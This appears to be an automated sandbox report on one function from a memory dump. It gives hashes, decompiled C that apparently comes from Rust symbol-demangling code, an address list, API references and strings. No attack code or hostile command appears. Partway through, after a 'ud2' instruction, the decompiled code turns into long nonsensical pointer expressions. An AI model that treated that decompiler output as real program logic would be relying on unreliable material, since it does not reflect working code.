API String ID: 1617791916-3454309823
Opcode ID: ec6aaca04476368eac450f417d06f62ed40ac775edf36c46eb97f0765f0bfb3d
Instruction ID: 985006805b262316598c77f4030ae482a288462bde6eb0b4a798cd7be7fd8c9f
Opcode Fuzzy Hash: ec6aaca04476368eac450f417d06f62ed40ac775edf36c46eb97f0765f0bfb3d
Instruction Fuzzy Hash: 9D02BDB1E402198BEF10CF98C8907DDBBB1FF49714F244169E919BB284E771A885CF96

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC75F4, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E6ECC75F4(signed int __ecx, void* __eflags) {
				intOrPtr _t127;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t133;
				void* _t134;
				intOrPtr* _t136;
				intOrPtr* _t138;
				intOrPtr* _t140;
				intOrPtr* _t150;
				intOrPtr* _t153;
				intOrPtr* _t154;
				signed int* _t155;
				signed int _t157;
				signed int _t158;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				signed int _t167;
				signed int _t170;
				signed int _t171;
				void* _t173;
				void* _t175;
				signed int _t176;
				signed int _t180;
				signed int _t181;
				signed int _t183;
				signed int _t184;
				signed int _t196;
				void* _t198;
				void* _t200;
				signed char _t201;
				signed int* _t203;
				signed char _t204;
				signed int _t207;
				signed char _t208;
				intOrPtr _t212;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				char* _t220;
				char* _t221;
				signed int _t222;
				signed int _t225;
				signed int _t226;
				signed int _t238;
				signed int _t239;
				signed int _t241;
				signed int _t245;
				intOrPtr _t250;
				signed char _t251;
				signed int _t258;
				intOrPtr _t268;
				unsigned int _t273;
				void* _t281;
				char* _t282;
				signed short _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				char* _t295;
				signed int _t303;
				signed int _t307;
				void* _t308;
				void* _t311;
				void* _t312;
				signed int* _t313;
				void* _t316;

				_pop(_t127);
				if(__eflags != 0) {
					 *((intOrPtr*)(_t308 + 0x10)) = _t250;
					_t251 =  *(__ecx + 4);
					 *((intOrPtr*)(_t308 + 0x14)) = _t127;
					 *(_t308 + 4) = __ecx;
					__eflags = _t251;
					if(_t251 == 0) {
						L19:
						_t288 =  *(_t308 + 4);
						_t214 =  *(_t288 + 0x14);
						__eflags =  *(_t288 + 0x14);
						if( *(_t288 + 0x14) == 0) {
							L21:
							 *_t288 = 1;
							goto L22;
						} else {
							_push(0x10);
							_t129 = E6ECC1C10(_t214,  &M6ED0F395);
							_t215 = 1;
							__eflags = _t129;
							if(_t129 == 0) {
								goto L21;
							}
						}
						goto L23;
					} else {
						_t130 =  *(_t308 + 4);
						_t216 =  *(_t130 + 0xc);
						_t131 =  *(_t130 + 8);
						__eflags = _t216 - _t131;
						 *(_t308 + 0xc) = _t216;
						 *(_t308 + 8) = _t131;
						if(_t216 < _t131) {
							_t290 =  *(_t308 + 4);
							_t279 = 0xffffffff;
							_t133 =  *(_t308 + 0xc) + 1;
							__eflags = _t133;
							_t218 =  ~( *(_t308 + 8));
							while(1) {
								__eflags = _t218 + _t133 - 1;
								if(_t218 + _t133 == 1) {
									goto L19;
								}
								_t196 =  *(_t251 + _t133 - 1) & 0x000000ff;
								 *(_t290 + 0xc) = _t133;
								_t133 = _t133 + 1;
								_t279 = _t279 + 1;
								_t198 = _t196 + 0xd0;
								__eflags = _t198 - 0xa;
								if(_t198 < 0xa) {
									continue;
								} else {
									_t200 = _t198 + 0x9f;
									__eflags = _t200 - 6;
									if(_t200 < 6) {
										continue;
									} else {
										__eflags = _t200 - 0x5f;
										if(_t200 != 0x5f) {
											goto L19;
										} else {
											_t291 =  *(_t308 + 0xc);
											_t134 = _t133 + 0xfffffffe;
											_t201 = _t251;
											__eflags = _t134 - _t291;
											if(_t134 < _t291) {
												L38:
												E6ECE9620(_t201,  *(_t308 + 8), _t291, _t134, 0x6ed0f33c);
												_t311 = _t308 + 0xc;
												asm("ud2");
												goto L39;
											} else {
												__eflags = _t291;
												if(_t291 == 0) {
													L13:
													_t209 = _t201 + _t291;
													_t268 = _t308 + 0x18;
													 *((intOrPtr*)(_t308 + 0x18)) = _t201 + _t291;
													 *(_t308 + 0x1c) = _t279;
													E6ECC8560(_t308 + 0x20, _t268);
													__eflags =  *(_t308 + 0x20);
													if( *(_t308 + 0x20) == 0) {
														_t291 =  *( *(_t308 + 4) + 0x14);
														__eflags = _t291;
														if(_t291 == 0) {
															goto L22;
														} else {
															_push(2);
															_t180 = E6ECC1C10(_t291, 0x6ed0f427);
															_t316 = _t308 + 4;
															_t215 = 1;
															__eflags = _t180;
															if(_t180 != 0) {
																goto L23;
															} else {
																_push(_t279);
																_t181 = E6ECC1C10(_t291, _t209);
																_t215 = 1;
																_t311 = _t316 + 4;
																goto L34;
															}
														}
													} else {
														_t183 =  *( *(_t308 + 4) + 0x14);
														__eflags = _t183;
														if(_t183 == 0) {
															goto L22;
														} else {
															 *(_t308 + 8) = _t183;
															_t212 =  *((intOrPtr*)(_t308 + 0x2c));
															_t184 =  *(_t308 + 0x28);
															__eflags = _t184 - 0x2710;
															asm("sbb ecx, 0x0");
															if(_t184 < 0x2710) {
																_t238 = 0x27;
															} else {
																_t241 = 0x27;
																asm("o16 nop [cs:eax+eax]");
																do {
																	 *(_t308 + 4) = _t241;
																	 *(_t308 + 0xc) = _t184;
																	_t286 = E6ECDC5D0(_t184, _t212, 0x2710, 0);
																	_t184 = E6ECDC650(_t184, _t212, 0x2710, 0);
																	_t245 = ((_t286 & 0x0000ffff) >> 2) * 0x147b >> 0x11;
																	__eflags = 0x5f5e0ff -  *(_t308 + 0xc);
																	asm("sbb esi, ebx");
																	_t303 =  *(_t308 + 4);
																	_t212 = _t268;
																	 *((short*)(_t308 + _t303 + 0x31)) =  *(_t245 + _t245 + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
																	 *((short*)(_t308 + _t303 + 0x33)) =  *((_t286 - _t245 * 0x00000064 & 0x0000ffff) + (_t286 - _t245 * 0x00000064 & 0x0000ffff) + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
																	_t241 = _t303 - 4;
																} while (0x5f5e0ff <  *(_t308 + 0xc));
															}
															_t279 =  *(_t308 + 8);
															__eflags = _t184 - 0x63;
															if(_t184 > 0x63) {
																_t273 = _t184 & 0x0000ffff;
																_t184 = (_t273 >> 2) * 0x147b >> 0x11;
																 *((short*)(_t308 + _t238 + 0x33)) =  *((_t273 - _t184 * 0x00000064 & 0x0000ffff) + (_t273 - _t184 * 0x00000064 & 0x0000ffff) + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
																_t238 = _t238 + 0xfffffffe;
																__eflags = _t238;
															}
															__eflags = _t184 - 0xa;
															if(_t184 >= 0xa) {
																 *((short*)(_t308 + _t238 + 0x33)) =  *(_t184 + _t184 + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
																_t239 = _t238 + 0xfffffffe;
																__eflags = _t239;
															} else {
																 *((char*)(_t308 + _t238 + 0x34)) = _t184 + 0x30;
																_t239 = _t238 - 1;
															}
															__eflags = 0x27;
															_push(0x27 - _t239);
															_t291 = _t279;
															_push(_t308 + _t239 + 0x35);
															_push(0);
															_t181 = E6ECC18D0(_t279, 0x6ed0f570);
															_t311 = _t308 + 0xc;
															_t215 = 1;
															L34:
															__eflags = _t181;
															if(_t181 != 0) {
																goto L23;
															} else {
																__eflags =  *_t291 & 0x00000004;
																if(( *_t291 & 0x00000004) != 0) {
																	goto L22;
																} else {
																	_t201 =  *((intOrPtr*)(_t311 + 0x10)) + 0x9f;
																	__eflags = _t201 - 0x19;
																	if(__eflags <= 0) {
																		_t279 = _t201 & 0x000000ff;
																		_t134 = 4;
																		_t201 =  *((intOrPtr*)(_t311 + 0x14)) +  *((intOrPtr*)(0x6ecc79d8 + (_t201 & 0x000000ff) * 4));
																		goto __ebx;
																	}
																	L39:
																	_t220 = "called `Option::unwrap()` on a `None` value";
																	_t136 = E6ECE94E0(_t201, _t220, 0x2b, _t279, _t291, __eflags, 0x6ed0f42c);
																	_t312 = _t311 + 4;
																	asm("ud2");
																	asm("stosb");
																	 *((intOrPtr*)(_t220 - 0x46fffffd)) =  *((intOrPtr*)(_t220 - 0x46fffffd)) + _t201;
																	_t138 = _t136 +  *_t136 +  *((intOrPtr*)(_t136 +  *_t136));
																	_t140 = _t138 +  *_t138 +  *((intOrPtr*)(_t138 +  *_t138));
																	_t221 =  &(_t220[_t140]);
																	_t203 = _t201 + _t138 + _t201 + _t138;
																	 *_t291 =  *_t291 + _t221;
																	 *0x2b =  *0x2b + _t203;
																	_t150 = _t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221))));
																	 *_t291 =  *_t291 + _t150;
																	 *0x2b =  *0x2b + 0x56;
																	 *_t221 =  *_t221 + _t203;
																	_t153 = _t150 +  *_t150 +  *((intOrPtr*)(_t150 +  *_t150)) +  *((intOrPtr*)(_t150 +  *_t150 +  *((intOrPtr*)(_t150 +  *_t150))));
																	 *((intOrPtr*)(_t153 + 3)) =  *((intOrPtr*)(_t153 + 3)) + _t153;
																	 *_t153 =  *_t153 + _t153;
																	asm("enter 0x3, 0x0");
																	asm("enter 0x3, 0x0");
																	_t154 = _t153 +  *_t153;
																	_t203[0] = _t203[0] + 0x56;
																	 *_t154 =  *_t154 + _t154;
																	_pop(_t281);
																	_t155 = _t154 +  *_t154;
																	_t203[0] = _t203[0] + _t221;
																	 *_t155 = _t155 +  *_t155;
																	__eflags =  *_t155;
																	asm("enter 0x3, 0x0");
																	if( *_t155 <= 0) {
																		 *_t155 = _t155 +  *_t155;
																		 *_t203 =  *_t203;
																		__eflags =  *_t203;
																	}
																	_t76 = _t281 + 0x55000003;
																	 *_t76 =  *(_t281 + 0x55000003) + _t221;
																	__eflags =  *_t76;
																	_push(_t203);
																	_push(_t281);
																	_push(_t291);
																	_t313 = _t312 - 0x24;
																	__eflags =  *_t221 - 1;
																	_t282 = _t221;
																	if( *_t221 != 1) {
																		_t222 =  *(_t282 + 8);
																		_t292 =  *(_t282 + 0xc);
																		_t157 =  *(_t282 + 4);
																		__eflags = _t292 - _t222;
																		_t313[3] = _t222;
																		if(_t292 >= _t222) {
																			L53:
																			__eflags = _t157;
																			if(_t157 == 0) {
																				L67:
																				_t204 = 0;
																				goto L72;
																			} else {
																				_t313[1] = 0x56;
																				_t258 = 0;
																				__eflags = _t292 - _t313[3];
																				_t204 = 0;
																				 *_t313 = _t292;
																				if(_t292 >= _t313[3]) {
																					goto L72;
																				} else {
																					_t313[2] = _t157;
																					_t225 = 0;
																					__eflags = 0;
																					_t307 =  *_t313 + 1;
																					_t164 = _t313[2];
																					asm("o16 nop [cs:eax+eax]");
																					while(1) {
																						_t165 =  *(_t164 + _t307 - 1) & 0x000000ff;
																						__eflags = _t165 - 0x5f;
																						if(_t165 == 0x5f) {
																							break;
																						}
																						_t207 = _t165 + 0xd0;
																						__eflags = _t207 - 0xa;
																						if(__eflags < 0) {
																							L63:
																							_t295 = _t282;
																							 *(_t282 + 0xc) = _t307;
																							_t170 = _t225;
																							_t208 = _t207 & 0xffffff00 | __eflags > 0x00000000;
																							_t171 = _t170 * 0x3e;
																							_t258 = (_t170 * 0x3e >> 0x20) + _t258 * 0x3e;
																							if(__eflags != 0) {
																								_t204 = 0;
																								__eflags = 0;
																								goto L71;
																							} else {
																								_t204 = 0;
																								_t225 = _t171 + (_t208 & 0x000000ff);
																								__eflags = _t225;
																								asm("adc edx, 0x0");
																								if(_t225 < 0) {
																									L71:
																									_t282 = _t295;
																									goto L72;
																								} else {
																									__eflags = _t313[3] - _t307;
																									_t164 = _t313[2];
																									_t307 = _t307 + 1;
																									_t282 = _t295;
																									if(__eflags != 0) {
																										continue;
																									} else {
																										goto L72;
																									}
																								}
																							}
																						} else {
																							_t173 = _t165 + 0x9f;
																							__eflags = _t173 - 0x1a;
																							if(__eflags >= 0) {
																								_t175 = _t173 + 0xbf;
																								__eflags = _t175 - 0x1a;
																								if(_t175 >= 0x1a) {
																									goto L67;
																								} else {
																									_t176 = _t175 + 0xe3;
																									__eflags = _t176;
																									goto L62;
																								}
																							} else {
																								_t176 = _t173 + 0xa9;
																								L62:
																								_t207 = _t176;
																								goto L63;
																							}
																						}
																						goto L76;
																					}
																					_t204 = 0;
																					_t226 = _t225 + 1;
																					__eflags = _t226;
																					 *(_t282 + 0xc) = _t307;
																					asm("adc edx, 0x0");
																					if(_t226 < 0) {
																						goto L72;
																					} else {
																						_t292 =  *_t313;
																						goto L49;
																					}
																				}
																			}
																		} else {
																			__eflags = _t157;
																			if(_t157 == 0) {
																				goto L53;
																			} else {
																				__eflags =  *((char*)(_t157 + _t292)) - 0x5f;
																				if( *((char*)(_t157 + _t292)) != 0x5f) {
																					goto L53;
																				} else {
																					_t313[1] = 0x56;
																					_t226 = 0;
																					__eflags = 0;
																					 *(_t282 + 0xc) = _t292 + 1;
																					L49:
																					_t204 = 0;
																					__eflags = _t226 - _t292 - 1;
																					asm("sbb edx, 0x0");
																					if(_t226 >= _t292 - 1) {
																						L72:
																						_t223 =  *(_t282 + 0x14);
																						__eflags =  *(_t282 + 0x14);
																						if( *(_t282 + 0x14) == 0) {
																							L74:
																							 *_t282 = 1;
																							 *(_t282 + 1) = _t204;
																							goto L75;
																						} else {
																							__eflags = _t204;
																							_t257 =  !=  ? "{recursion limit reached}{invalid syntax}" :  &M6ED0F395;
																							_push((_t204 & 0x000000ff) + 0x10 + (_t204 & 0x000000ff) * 8);
																							_t162 = E6ECC1C10(_t223,  !=  ? "{recursion limit reached}{invalid syntax}" :  &M6ED0F395);
																							_t313 =  &(_t313[1]);
																							_t158 = 1;
																							__eflags = _t162;
																							if(_t162 == 0) {
																								goto L74;
																							}
																						}
																					} else {
																						_t204 = 1;
																						_t167 =  *(_t282 + 0x10) + 1;
																						__eflags = _t167 - 0x1f4;
																						if(_t167 > 0x1f4) {
																							goto L72;
																						} else {
																							__eflags =  *(_t282 + 0x14);
																							if( *(_t282 + 0x14) == 0) {
																								goto L75;
																							} else {
																								asm("movsd xmm0, [edi]");
																								asm("movsd xmm1, [edi+0x8]");
																								 *_t282 = 0;
																								 *(_t282 + 0xc) = _t226;
																								 *(_t282 + 0x10) = _t167;
																								_t313[8] =  *(_t282 + 0x10);
																								__eflags = _t313[1];
																								asm("movsd [esp+0x18], xmm1");
																								asm("movsd [esp+0x10], xmm0");
																								_t158 = E6ECC6D90(_t282);
																								asm("movsd xmm0, [esp+0x10]");
																								asm("movsd xmm1, [esp+0x18]");
																								asm("movsd [edi], xmm0");
																								asm("movsd [edi+0x8], xmm1");
																								 *(_t282 + 0x10) = _t313[8];
																							}
																						}
																					}
																				}
																			}
																		}
																		goto L76;
																	} else {
																		_t232 =  *(_t282 + 0x14);
																		__eflags =  *(_t282 + 0x14);
																		if( *(_t282 + 0x14) == 0) {
																			L75:
																			_t158 = 0;
																			__eflags = 0;
																			L76:
																		} else {
																			_push(1);
																			_t158 = E6ECC1C10(_t232, "?\'for<, >  as ::{shimclosure#[]dyn  + ; mut const  unsafe extern \"");
																		}
																	}
																	return _t158;
																}
															}
														}
													}
												} else {
													__eflags =  *((char*)(_t201 + _t291)) - 0xbf;
													if( *((char*)(_t201 + _t291)) <= 0xbf) {
														goto L38;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								}
								goto L78;
							}
						}
						goto L19;
					}
				} else {
					_t249 =  *((intOrPtr*)(__ecx + 0x14));
					if( *((intOrPtr*)(__ecx + 0x14)) == 0) {
						L22:
						_t215 = 0;
						__eflags = 0;
					} else {
						_push(1);
						_t215 = E6ECC1C10(_t249, "?\'for<, >  as ::{shimclosure#[]dyn  + ; mut const  unsafe extern \"");
					}
					L23:
					return _t215;
				}
				L78:
			}

0x6ecc75f4
0x6ecc75f5
0x6ecc7618
0x6ecc761c
0x6ecc761f
0x6ecc7623
0x6ecc7627
0x6ecc7629
0x6ecc7786
0x6ecc7786
0x6ecc778a
0x6ecc778d
0x6ecc778f
0x6ecc77a6
0x6ecc77a6
0x00000000
0x6ecc7791
0x6ecc7796
0x6ecc7798
0x6ecc77a0
0x6ecc77a2
0x6ecc77a4
0x00000000
0x00000000
0x6ecc77a4
0x00000000
0x6ecc762f
0x6ecc762f
0x6ecc7633
0x6ecc7636
0x6ecc7639
0x6ecc763b
0x6ecc763f
0x6ecc7643
0x6ecc7651
0x6ecc7655
0x6ecc765a
0x6ecc765a
0x6ecc765b
0x6ecc7660
0x6ecc7663
0x6ecc7666
0x00000000
0x00000000
0x6ecc766e
0x6ecc7673
0x6ecc7676
0x6ecc7677
0x6ecc767a
0x6ecc767d
0x6ecc7680
0x00000000
0x6ecc7682
0x6ecc7684
0x6ecc7687
0x6ecc768a
0x00000000
0x6ecc768c
0x6ecc768c
0x6ecc768f
0x00000000
0x6ecc7695
0x6ecc7695
0x6ecc7699
0x6ecc769c
0x6ecc769e
0x6ecc76a0
0x6ecc79a5
0x6ecc79b2
0x6ecc79b7
0x6ecc79ba
0x00000000
0x6ecc76a6
0x6ecc76a6
0x6ecc76a8
0x6ecc76b4
0x6ecc76b4
0x6ecc76ba
0x6ecc76be
0x6ecc76c2
0x6ecc76c6
0x6ecc76cb
0x6ecc76d0
0x6ecc77bb
0x6ecc77be
0x6ecc77c0
0x00000000
0x6ecc77c2
0x6ecc77c9
0x6ecc77cb
0x6ecc77d0
0x6ecc77d3
0x6ecc77d5
0x6ecc77d7
0x00000000
0x6ecc77d9
0x6ecc77dd
0x6ecc77de
0x6ecc77e3
0x6ecc77e5
0x00000000
0x6ecc77e5
0x6ecc77d7
0x6ecc76d6
0x6ecc76da
0x6ecc76dd
0x6ecc76df
0x00000000
0x6ecc76e5
0x6ecc76e5
0x6ecc76e9
0x6ecc76ed
0x6ecc76f1
0x6ecc76f8
0x6ecc76fb
0x6ecc77ea
0x6ecc7701
0x6ecc7701
0x6ecc7706
0x6ecc7710
0x6ecc7710
0x6ecc7716
0x6ecc7728
0x6ecc7733
0x6ecc7744
0x6ecc7759
0x6ecc7762
0x6ecc7764
0x6ecc7768
0x6ecc776a
0x6ecc777a
0x6ecc777f
0x6ecc777f
0x6ecc7784
0x6ecc77ef
0x6ecc77f3
0x6ecc77f6
0x6ecc77f8
0x6ecc7806
0x6ecc7819
0x6ecc781e
0x6ecc781e
0x6ecc781e
0x6ecc7821
0x6ecc7824
0x6ecc7837
0x6ecc783c
0x6ecc783c
0x6ecc7826
0x6ecc7828
0x6ecc782c
0x6ecc782c
0x6ecc784d
0x6ecc7851
0x6ecc7852
0x6ecc7854
0x6ecc7855
0x6ecc7857
0x6ecc785c
0x6ecc785f
0x6ecc7861
0x6ecc7861
0x6ecc7863
0x00000000
0x6ecc7869
0x6ecc7869
0x6ecc786c
0x00000000
0x6ecc7872
0x6ecc7876
0x6ecc7879
0x6ecc787c
0x6ecc7882
0x6ecc7890
0x6ecc7895
0x6ecc789c
0x6ecc789c
0x6ecc79bc
0x6ecc79bc
0x6ecc79cb
0x6ecc79d0
0x6ecc79d3
0x6ecc79d8
0x6ecc79db
0x6ecc79e1
0x6ecc79e9
0x6ecc79eb
0x6ecc79f7
0x6ecc79fb
0x6ecc7a03
0x6ecc7a05
0x6ecc7a07
0x6ecc7a0b
0x6ecc7a0f
0x6ecc7a11
0x6ecc7a13
0x6ecc7a16
0x6ecc7a18
0x6ecc7a1c
0x6ecc7a21
0x6ecc7a23
0x6ecc7a26
0x6ecc7a28
0x6ecc7a29
0x6ecc7a2b
0x6ecc7a2e
0x6ecc7a2e
0x6ecc7a30
0x6ecc7a34
0x6ecc7a36
0x6ecc7a38
0x6ecc7a38
0x6ecc7a38
0x6ecc7a3b
0x6ecc7a3b
0x6ecc7a3b
0x6ecc7a41
0x6ecc7a42
0x6ecc7a43
0x6ecc7a44
0x6ecc7a47
0x6ecc7a4a
0x6ecc7a4c
0x6ecc7a6d
0x6ecc7a70
0x6ecc7a73
0x6ecc7a76
0x6ecc7a78
0x6ecc7a7c
0x6ecc7b22
0x6ecc7b22
0x6ecc7b24
0x6ecc7be2
0x6ecc7be2
0x00000000
0x6ecc7b2a
0x6ecc7b2a
0x6ecc7b2e
0x6ecc7b30
0x6ecc7b34
0x6ecc7b39
0x6ecc7b3c
0x00000000
0x6ecc7b42
0x6ecc7b42
0x6ecc7b49
0x6ecc7b49
0x6ecc7b4b
0x6ecc7b4e
0x6ecc7b52
0x6ecc7b60
0x6ecc7b60
0x6ecc7b65
0x6ecc7b67
0x00000000
0x00000000
0x6ecc7b6b
0x6ecc7b6e
0x6ecc7b71
0x6ecc7b9e
0x6ecc7ba5
0x6ecc7ba7
0x6ecc7bb3
0x6ecc7bb5
0x6ecc7bb8
0x6ecc7bba
0x6ecc7bc1
0x6ecc7bfb
0x6ecc7bfb
0x00000000
0x6ecc7bc3
0x6ecc7bc8
0x6ecc7bca
0x6ecc7bca
0x6ecc7bcc
0x6ecc7bcf
0x6ecc7bfd
0x6ecc7bfd
0x00000000
0x6ecc7bd1
0x6ecc7bd1
0x6ecc7bd5
0x6ecc7bd9
0x6ecc7bdc
0x6ecc7bde
0x00000000
0x6ecc7be0
0x00000000
0x6ecc7be0
0x6ecc7bde
0x6ecc7bcf
0x6ecc7b73
0x6ecc7b75
0x6ecc7b78
0x6ecc7b7b
0x6ecc7b92
0x6ecc7b95
0x6ecc7b98
0x00000000
0x6ecc7b9a
0x6ecc7b9a
0x6ecc7b9a
0x00000000
0x6ecc7b9a
0x6ecc7b7d
0x6ecc7b7d
0x6ecc7b9c
0x6ecc7b9c
0x00000000
0x6ecc7b9c
0x6ecc7b7b
0x00000000
0x6ecc7b71
0x6ecc7be6
0x6ecc7be8
0x6ecc7be8
0x6ecc7beb
0x6ecc7bee
0x6ecc7bf1
0x00000000
0x6ecc7bf3
0x6ecc7bf3
0x00000000
0x6ecc7bf3
0x6ecc7bf1
0x6ecc7b3c
0x6ecc7a82
0x6ecc7a82
0x6ecc7a84
0x00000000
0x6ecc7a8a
0x6ecc7a8a
0x6ecc7a8e
0x00000000
0x6ecc7a94
0x6ecc7a94
0x6ecc7a9b
0x6ecc7a9d
0x6ecc7a9f
0x6ecc7aa2
0x6ecc7aa3
0x6ecc7aa5
0x6ecc7aa7
0x6ecc7aaa
0x6ecc7bff
0x6ecc7bff
0x6ecc7c02
0x6ecc7c04
0x6ecc7c2d
0x6ecc7c2d
0x6ecc7c30
0x00000000
0x6ecc7c06
0x6ecc7c10
0x6ecc7c12
0x6ecc7c1c
0x6ecc7c1d
0x6ecc7c22
0x6ecc7c27
0x6ecc7c29
0x6ecc7c2b
0x00000000
0x00000000
0x6ecc7c2b
0x6ecc7ab0
0x6ecc7ab3
0x6ecc7ab5
0x6ecc7ab6
0x6ecc7abb
0x00000000
0x6ecc7ac1
0x6ecc7ac1
0x6ecc7ac5
0x00000000
0x6ecc7acb
0x6ecc7ace
0x6ecc7ad2
0x6ecc7ad7
0x6ecc7ada
0x6ecc7adf
0x6ecc7ae2
0x6ecc7ae8
0x6ecc7aed
0x6ecc7af3
0x6ecc7afc
0x6ecc7b01
0x6ecc7b07
0x6ecc7b11
0x6ecc7b15
0x6ecc7b1a
0x6ecc7b1a
0x6ecc7ac5
0x6ecc7abb
0x6ecc7aaa
0x6ecc7a8e
0x6ecc7a84
0x00000000
0x6ecc7a4e
0x6ecc7a4e
0x6ecc7a51
0x6ecc7a53
0x6ecc7c33
0x6ecc7c33
0x6ecc7c33
0x6ecc7c35
0x6ecc7a59
0x6ecc7a5e
0x6ecc7a60
0x6ecc7a65
0x6ecc7a53
0x6ecc7c3c
0x6ecc7c3c
0x6ecc786c
0x6ecc7863
0x6ecc76df
0x6ecc76aa
0x6ecc76aa
0x6ecc76ae
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecc76ae
0x6ecc76a8
0x6ecc76a0
0x6ecc768f
0x6ecc768a
0x00000000
0x6ecc7680
0x6ecc7660
0x00000000
0x6ecc7643
0x6ecc75f7
0x6ecc75f7
0x6ecc75fc
0x6ecc77ab
0x6ecc77ab
0x6ecc77ab
0x6ecc7602
0x6ecc7607
0x6ecc7611
0x6ecc7611
0x6ecc77ad
0x6ecc77b6
0x6ecc77b6
0x00000000

APIs

__aullrem.LIBCMT ref: 6ECC7723
__aulldiv.LIBCMT ref: 6ECC7733

Strings

{recursion limit reached}{invalid syntax}, xrefs: 6ECC7C06
bool, xrefs: 6ECC788B
called `Option::unwrap()` on a `None` value, xrefs: 6ECC79BC
?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ECC7602, 6ECC7A59

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

